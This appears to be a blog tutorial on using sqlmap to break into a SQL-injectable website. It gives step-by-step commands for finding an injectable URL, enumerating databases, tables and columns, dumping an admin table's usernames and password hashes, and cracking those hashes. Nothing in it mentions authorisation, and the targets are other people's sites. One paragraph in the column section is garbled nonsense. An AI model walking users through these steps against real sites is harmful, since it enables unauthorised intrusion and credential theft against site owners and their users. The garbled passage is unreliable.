How To Hack Vulnerable Website With SQLMAP

How To Hack Vulnerable Website With SQLMAP

How To Hack Vulnerable Website With SQLMAP

Hack website and Take Database over using SQLMAP.

What is SQLMAP?

SQL map is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine.

many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

SQLMAP is pre-installed on Kali Linux.

It has many more feature in this article we will see how you can take over the database with SQLMAP.So if you want to do extra research on SQLMAP and it's features then visit their official website.

So before using SQLMAP, we need a vulnerable website. find a Vulnerable Website.

Paste URL into your browser.Let's say you have posted the following URL:
http://www.demo.com/form.php?id=5
Now to check whether the website is vulnerable to injection or not Just add Single quotation mark ' at the end of URL, Now your address should look like this:
http://www.yourtarget.com/form.php?id=5'

If it returns the error as shown in below picture then the website is vulnerable to injection.

Once you have your target ready then open your terminal and type the following command.It displays all the commands that you can use with SQLMAP.Go through it.

root@seven:~# sqlmap -h
Usage: python sqlmap [options]
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
Target:
    At least one of these options has to be provided to define the
    target(s)
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs
  Request:
      These options can be used to specify how to connect to the target URL
    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
   -p TESTPARAMETER    Testable parameter(s)
   --dbms=DBMS         Force back-end DBMS to this value
   -a, --all           Retrieve everything

Grab all the databases

The first thing we need to do is to look for all the available databases on the website.Syntax goes like this:

Syntax:

sqlmap -u [URL] --dbs

-U   is for URL.
--DBS:   is for enumerating DBMS database.It fetches all the databases inside the website.

Complete command:

root@seven:~# sqlmap -u www.yourtarget.com/index.php?id=31 --dbs 

Just press y when it asks it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? Because Sqlmap has detected back end database in this case as you can see it's MySql.So press y and skip further testing.In very next line press y too.

Wait for few minutes until it finishes.On the successful completion, it will list all the databases on the website.

The information_schema database is a standard database for every MYSQL database so ignore it.
So we are interested in other(guru) database.Now choose a database that you want to exploit.I am going to exploit guru.

Extract Tables inside database

Once you choose the database that you want to exploit then we need to look at its tables.

You have to give two parameters:

Syntax:

sqlmap -u [URL] -D Database_name --tables

1. -D:   option is for the database you must give the database name that you want to exploit.
2. --tables: Extracts the tables inside the database.

Complete Command:

root@seven:~# root@seven:~# sqlmap -u  http://target.com/product_detail.php?ID=41  -D guru --tables

Replace the database_name with the database that you want to exploit.

As you can see from the below picture that we have fetched tables.There are plenty of tables but we are interested in AdminUser.

Also Check: Beginners Ethical Hacking Course

Extract columns

Now next thing you will be interested in is columns of the table.Now that we have a table that we want to exploit we have to extract columns of the table:

1. -D:    option is for the database you must give database name.
2. -T: Table name.
3. --columns: It retrieves the columns inside a table.

we can always do this later we have to be precise not only in another area of ground also in bleaching area codes we can assess the situations pretty well as per performance we have to rectify the right guys either do it practically or symmetrically whatever way we choose things will always re, gain the same if there is a vulnerability that we can expect

Complete command:

root@seven:~# sqlmap -u  http://target.com/product_detail.php?ID=41  -D guru -T AdminUser --columns 

When it finishes it displays all the columns inside the table.As you can see in the above picture. Now we know our columns.Go through columns you may find interesting columns like username, passwords, and emails etc.I am going to access USR_Password column first.We will extract username stored inside the column(USR_Username). You need give the following options:

1. -D:     For accessing the database.
2. -T:   For accessing Table.
3. -C:   For accessing column.
4. --dump:    command will extract data inside the column.

Full command:

root@seven:~# sqlmap -u  http://target.com/product_detail.php?ID=41  -D guru -T AdminUser -C USR_Username --dump 

We have found two admin accounts here.Now we need the password.

If there are many users then it takes time so to speed up the information retrieval speed We can use --threads option for faster data retrieval.

root@seven:~# sqlmap -u  http://target.com/product_detail.php?ID=41  -D guru -T AdminUser -C USR_Username --dump  --threads 7

It's time to see the password column.Command stays the same except the column name.So replace the USR_Username(Username) column with the USR_Password(password).

root@seven:~# sqlmap -u  http://target.com/product_detail.php?ID=41  -D guru -T AdminUser -C USR_Password  --dump 

Of course, the password will not be presented in plain text so we have crack password.As you can see in the below picture.You will be asked to crack the password using dictionary-based attack press y and hit enter.

Now press 1 to use default dictionary if you have your custom dictionary file then specify the path.Once you press 1 it will start cracking the hashes.In most cases, hashes will not be cracked with default dictionary file.

It did not find any passwords so we have look for other alternatives.There are lots of online md5 decrypters.

So make note of your hashes.We will use has a killer website to crack the hash.

Go to the has killer to crack the hash.Paste hash on the right side at the bottom fill the captcha and click on the submit button.Cracked hash will be shown along with hash on the right side, as you can see in below picture I have cracked my hash successfully.

Also Check: Beginners Ethical Hacking Course

So above are the How To Hack Vulnerable Website With SQLMAP. Hope you like this article, keep on sharing with others too. Also, share your experience with us in a comment box below.